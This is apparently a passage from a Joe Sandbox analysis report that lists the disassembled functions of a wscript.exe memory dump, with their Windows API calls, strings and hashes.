                                                                                                                                                                                                                      • Opcode ID: b4ca729cc1ce21e7714358597f4fd25923be3acb48553d8c17c4a02a7c95ba3b
                                                                                                                                                                                                                      • Instruction ID: 04d2928f9ddbcf2fbdbe813e0868061f8aeb6271755c295bae29884e0557386f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4ca729cc1ce21e7714358597f4fd25923be3acb48553d8c17c4a02a7c95ba3b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC613D7194122DABDB24AB64DC8DBEEBBBDFB58300F1001EAE919A2151DB304E85DF50
                                                                                                                                                                                                                      Function 005891C6 Relevance: 16.7, APIs: 11, Instructions: 180memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00583AF4), ref: 005891FF
                                                                                                                                                                                                                      • GetVersionExA.KERNEL32(?,00000000,005810C4,00000000), ref: 0058923F
                                                                                                                                                                                                                      • IsTextUnicode.ADVAPI32(?,?,?), ref: 0058926F
                                                                                                                                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00589345
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00000000,00000000,005810C4,00000000), ref: 00589372
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,00000000,00000000,005810C4,00000000), ref: 0058937C
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 005893EC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharErrorFreeLastMultiTextUnicodeVersionWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1844124450-0
                                                                                                                                                                                                                      • Opcode ID: 1be4e05359e8eda0ee65d03b6382ea81b936e31f72cf807a24ab2ee944ff5e1e
                                                                                                                                                                                                                      • Instruction ID: 89de89a0ced63f1ce1bbedadaa0cfc2f6bca0e209252443d954d2db15d13ad81
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1be4e05359e8eda0ee65d03b6382ea81b936e31f72cf807a24ab2ee944ff5e1e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7651C375A00329EFDF306F699C49BBA7FA4BF55314F0844A9EC4AB6280DB308D84DB51
                                                                                                                                                                                                                      Function 0058DEED Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 535comCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00583B20,00000000,00000001,00583B90,2Y,00592FD0,005810C4,00000000), ref: 0058DFA4
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00583B30,00000000,00000001,00583B90,2Y), ref: 0058DFB8
                                                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 0058DFCF
                                                                                                                                                                                                                      • CoGetClassObject.OLE32(00583B50,00000001,00000000,0058409C,?), ref: 0058E074
                                                                                                                                                                                                                      • CreateBindCtx.OLE32(00000000,?), ref: 0058E221
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create$Instance$BindClassDefaultObjectUser
                                                                                                                                                                                                                      • String ID: WSH$WScript$2Y
                                                                                                                                                                                                                      • API String ID: 1420412123-2458491470
                                                                                                                                                                                                                      • Opcode ID: f51ca5708b82fde601435248973221013988eaa567228c4882cf55638d7dbd46
                                                                                                                                                                                                                      • Instruction ID: 98eb15fb695fda0350e6883bd28e83971e52f18cb5ce5ef1375530660495f1a1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f51ca5708b82fde601435248973221013988eaa567228c4882cf55638d7dbd46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB127074B002059FDB14AF99E896A6D7BB6FF89710F15046DEA02BB3A1CF71AC01CB54
                                                                                                                                                                                                                      Function 00597A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00597B6E,00581000), ref: 00597A3F
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(n{Y,?,00597B6E,00581000), ref: 00597A48
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00597B6E,00581000), ref: 00597A53
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00597B6E,00581000), ref: 00597A5A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                      • String ID: n{Y
                                                                                                                                                                                                                      • API String ID: 3231755760-1668576853
                                                                                                                                                                                                                      • Opcode ID: 9db075fb6f5ac2b325de44082fb03bcd5a4f9e1b8b3bf9e96dbc68380327a3b3
                                                                                                                                                                                                                      • Instruction ID: 29afae3bbb12d1d5f992b1c5925a280b8d2c0c1546ca8cacaeb3c77005f1c09c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9db075fb6f5ac2b325de44082fb03bcd5a4f9e1b8b3bf9e96dbc68380327a3b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00D01236004344FFDB002BE9EC0DA493F28EBD8352F06400AF72E82060CB314419EB61
                                                                                                                                                                                                                      Function 005979A0 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 005979CD
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 005979DC
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 005979E5
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 005979EE
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00597A03
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1445889803-0
                                                                                                                                                                                                                      • Opcode ID: db096f3f416c239daeb8de51b0f1d53f33d6a542f127fe922e6062443bcebd00
                                                                                                                                                                                                                      • Instruction ID: 8d99e43482f99f507f43c8563960a87e054a660a63e24501e0111c5571726a4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db096f3f416c239daeb8de51b0f1d53f33d6a542f127fe922e6062443bcebd00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92110671D10208EBCF10DBB9D9486AEBBF4FF68314F56086AD402E7250EB309A04EB40
                                                                                                                                                                                                                      Function 00591170 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 345COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: WScript.CreateObject
                                                                                                                                                                                                                      • API String ID: 0-1366894974
                                                                                                                                                                                                                      • Opcode ID: fb5df615160f428ae6e056600efcd3b7f4ec3bc36f8f16f0bcb66fef70e5eb89
                                                                                                                                                                                                                      • Instruction ID: 161d7d06a5f912af3dd59ab789766ba1ce4ec4d416f45b00676ee342baa0bfe1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb5df615160f428ae6e056600efcd3b7f4ec3bc36f8f16f0bcb66fef70e5eb89
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51C19C752046229FCB14DF29D885A2A7BE9FFC8710F16492DF95687390DB30EC05CB96
                                                                                                                                                                                                                      Function 005908FD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66comCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 0059090E
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000015,00583860,?), ref: 00590998
                                                                                                                                                                                                                        • Part of subcall function 0058B1AA: CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B1C7
                                                                                                                                                                                                                        • Part of subcall function 0058B1AA: SysFreeString.OLEAUT32($:X), ref: 0058B36D
                                                                                                                                                                                                                        • Part of subcall function 0058B1AA: SysFreeString.OLEAUT32(00000A2C), ref: 0058B376
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFreeString$ErrorFromInfoInstanceProg
                                                                                                                                                                                                                      • String ID: WScript.CreateObject
                                                                                                                                                                                                                      • API String ID: 3168253046-1366894974
                                                                                                                                                                                                                      • Opcode ID: bf245684fae91618536d13163d4b00c095a73e33b1fe4cb7885a6d79f0d4d8a4
                                                                                                                                                                                                                      • Instruction ID: 9c904779a931dcdc2f6be1997a5d6ed7cbec6f63eaaa042d28acd0448abeaf4a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf245684fae91618536d13163d4b00c095a73e33b1fe4cb7885a6d79f0d4d8a4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD117232A4022ABBEF117B44CC0AF9D7E29BB54B60F115525BD007B292D7B19E5097C1
                                                                                                                                                                                                                      Function 00596D75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,00596DAD,00000000,00000000,00596FF4,00000000,00000000,00000000,?,00000000,?), ref: 00596D84
                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00596D92
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoad
                                                                                                                                                                                                                      • String ID: MUI
                                                                                                                                                                                                                      • API String ID: 2619053042-1339004836
                                                                                                                                                                                                                      • Opcode ID: 750db7c6116e3e1608568a10e3e5b4495707eeb94d6a2e22d7720d4ee4f1584c
                                                                                                                                                                                                                      • Instruction ID: 59f304732b26bdfcdfa8504f555406db9355138db22ee00ee1952f8e4cdf0571
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 750db7c6116e3e1608568a10e3e5b4495707eeb94d6a2e22d7720d4ee4f1584c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07D012317453617AEA202619BC0DFEB2E0CEB917A5F02004AF80595090D7905C86E5D8
                                                                                                                                                                                                                      Function 005951D4 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951E5
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951EC
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,005810C4,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 0059520B
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 00595212
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 756756679-0
                                                                                                                                                                                                                      • Opcode ID: 926e5737ba93a34e45d9c25dbba78317be6c3c36ff218435bbd14b87fae33d93
                                                                                                                                                                                                                      • Instruction ID: 46ebf67aeedf0dff9e351daae46fcc9500f07e1f9197c181c2e771a9b0dfcf4b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 926e5737ba93a34e45d9c25dbba78317be6c3c36ff218435bbd14b87fae33d93
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47F0C2351447029BDF251BBCE80DB167AA8FF14761F24891EF66ACA1A0F674C8A0DB54
                                                                                                                                                                                                                      Function 00589D9A Relevance: 4.7, APIs: 3, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateBindCtx.OLE32(00000000,?), ref: 00589DCE
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00589E84
                                                                                                                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,?), ref: 00589EEE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$AllocBindByteCreateFree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3716443497-0
                                                                                                                                                                                                                      • Opcode ID: 6af6415381d568e42e7801d5d6948b1c445ff89b2d082f1ea3c6dd1bf19d2998
                                                                                                                                                                                                                      • Instruction ID: 1a93c3ec2ac657a2ab86680acbd56ae895836f52568245e94618da11098154db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af6415381d568e42e7801d5d6948b1c445ff89b2d082f1ea3c6dd1bf19d2998
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D514D71A103199BDB14DF99D885AADBFB9FF88710F25012EE906BB351CB70AC05CB80
                                                                                                                                                                                                                      Function 00597084 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 005970A9
                                                                                                                                                                                                                      • wcsncmp.MSVCRT ref: 005970BE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocalewcsncmp
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4128031126-0
                                                                                                                                                                                                                      • Opcode ID: 94f7057d86e8bc8cc7514c7752ad0f141c06738e71bccaffa7a9f22d876da846
                                                                                                                                                                                                                      • Instruction ID: aa95ca4e2991b0042a9c8b75d21ad52a5f23d438580b411948fee7ec664f59a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94f7057d86e8bc8cc7514c7752ad0f141c06738e71bccaffa7a9f22d876da846
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AF027B5B5030D6BEB10DB799C0AFAE77E8AB44B04F410125BE15E72C0EA30EE09D654
                                                                                                                                                                                                                      Function 005889B1 Relevance: 54.7, APIs: 24, Strings: 7, Instructions: 425registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CoGetMalloc.OLE32(00000001,?,00000000,00000000,?), ref: 00588A04
                                                                                                                                                                                                                      • LoadRegTypeLib.OLEAUT32(005839F4,00000001,00000000,00000000,?), ref: 00588A24
                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 00588A78
                                                                                                                                                                                                                      • StringFromCLSID.OLE32(?,?), ref: 00588AA2
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00588C1A
                                                                                                                                                                                                                      • StringFromCLSID.OLE32(?,?), ref: 00588C71
                                                                                                                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 00588CDB
                                                                                                                                                                                                                      • sprintf_s.MSVCRT ref: 00588D04
                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00588D1E
                                                                                                                                                                                                                      • RegQueryValueA.ADVAPI32(?,Version,?,?), ref: 00588D4D
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,LocalServer32), ref: 00588D7B
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,TypeLib), ref: 00588D8C
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,Version), ref: 00588D99
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,ProgID), ref: 00588DAA
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00588DB6
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00588DC6
                                                                                                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 00588DDA
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,CLSID), ref: 00588DEF
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00588DFB
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 00588E03
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00588E11
                                                                                                                                                                                                                      • UnRegisterTypeLib.OLEAUT32(005839F4,00000001,00000000,00000000,00000001), ref: 00588E3D
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00588F44
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00588F50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Delete$String$Close$Open$FreeFromType$LoadMallocQueryRegisterValuesprintf_s
                                                                                                                                                                                                                      • String ID: $1.0$CLSID$LocalServer32$ProgID$TypeLib$Version
                                                                                                                                                                                                                      • API String ID: 418931453-1178591435
                                                                                                                                                                                                                      • Opcode ID: 9b42a82e88f4b83993c78eda5d3cf513973d79ae7fd09d92d8deba319fe24eac
                                                                                                                                                                                                                      • Instruction ID: 478ea4c56518e69e2e591da746cbd40eb5102f59045a53af8004c5e8bdaf3219
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b42a82e88f4b83993c78eda5d3cf513973d79ae7fd09d92d8deba319fe24eac
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F19274A002249FDB24AF68DC89B6D7BB9FF48700F5140EAEA09A7261CF319D85DF50
                                                                                                                                                                                                                      Function 0058CE25 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 219COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0058D0D8
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0058D11D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseFreeHandleLibrary
                                                                                                                                                                                                                      • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 10933145-3460866070
                                                                                                                                                                                                                      • Opcode ID: e6958e2dfbc21a485ccbfce3841181baecca10a1215f647070c18d0dce8f0044
                                                                                                                                                                                                                      • Instruction ID: 155112b2d1efb5e7e37875e91aa78ac412b4d1f1af2e03028c1f8b15ace5c9ca
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6958e2dfbc21a485ccbfce3841181baecca10a1215f647070c18d0dce8f0044
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8813E75A103199BDB20AF29DC49B9EBBF5BF84300F1100AAE949B7290DB719D85DF21
                                                                                                                                                                                                                      Function 00595E4B Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(ScriptFile,Path,00583AF4,?,00000104), ref: 00595E83
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000400,00000001), ref: 00595E99
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000400,00000001), ref: 00595EA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharErrorLastMultiPrivateProfileStringWide
                                                                                                                                                                                                                      • String ID: Path$ScriptFile
                                                                                                                                                                                                                      • API String ID: 3760252266-3888212790
                                                                                                                                                                                                                      • Opcode ID: 7c3f6b374cf00ecf74eab164b470cdf6cbbf7f806af6a729750ed657db61d0c0
                                                                                                                                                                                                                      • Instruction ID: e1d6b0cbbfc5d1d6248b5bb4e8e8f9c9a8c6b19dac49faa237e5e72b4a452cbb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c3f6b374cf00ecf74eab164b470cdf6cbbf7f806af6a729750ed657db61d0c0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2141A2B1611716BEFF212B769C0EE7B3E6CFF95720B11052ABD11E6180EA61CC1087B1
                                                                                                                                                                                                                      Function 0058A917 Relevance: 23.2, APIs: 7, Strings: 6, Instructions: 454libraryloaderwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00592196: GetACP.KERNEL32(00000000,005810C4,0058A948,?,00000000,00000000), ref: 005921A4
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(kernel32.dll,00000000,00000800), ref: 0058A9A5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 0058A9BB
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0058A9CC
                                                                                                                                                                                                                        • Part of subcall function 00589456: SysAllocString.OLEAUT32(?), ref: 00589534
                                                                                                                                                                                                                        • Part of subcall function 00589456: SysFreeString.OLEAUT32(?), ref: 005897B0
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0058A9F8
                                                                                                                                                                                                                      • CoRegisterMessageFilter.OLE32(00000000,00000008), ref: 0058AA41
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00000105), ref: 0058AA70
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary$String$AddressAllocFileFilterLoadMessageModuleNameProcRegister
                                                                                                                                                                                                                      • String ID: 0zX$0zX$HeapSetInformation$Open2$W$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 1008295733-356740519
                                                                                                                                                                                                                      • Opcode ID: 3017f3d8c59e14a85dce371562675f2e4e9c06390dc5cb33826fbf5857d234e1
                                                                                                                                                                                                                      • Instruction ID: 7bcdefe7c9eea464d3179ef68dc9333252253e880c6d3997b303348c14269126
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3017f3d8c59e14a85dce371562675f2e4e9c06390dc5cb33826fbf5857d234e1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AF1C2702053819FEB20AF28C88976A7FE5BF94304F15085EED86E7292DB749C49DB47
                                                                                                                                                                                                                      Function 0058B654 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 124memorywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B68F
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000A2C,00000000,0058B25F,?,?,?,?,?,005873FB,00583A24,WSHRemote.Execute,00000A2C), ref: 0058B69D
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B6C4
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0058B6D0
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?,?,?,?), ref: 0058B6EB
                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B707
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B71A
                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?,?,?,?,?,005873FB), ref: 0058B72F
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,00000000,?,00000A2C,00000000,0058B25F,?), ref: 0058B749
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0058B757
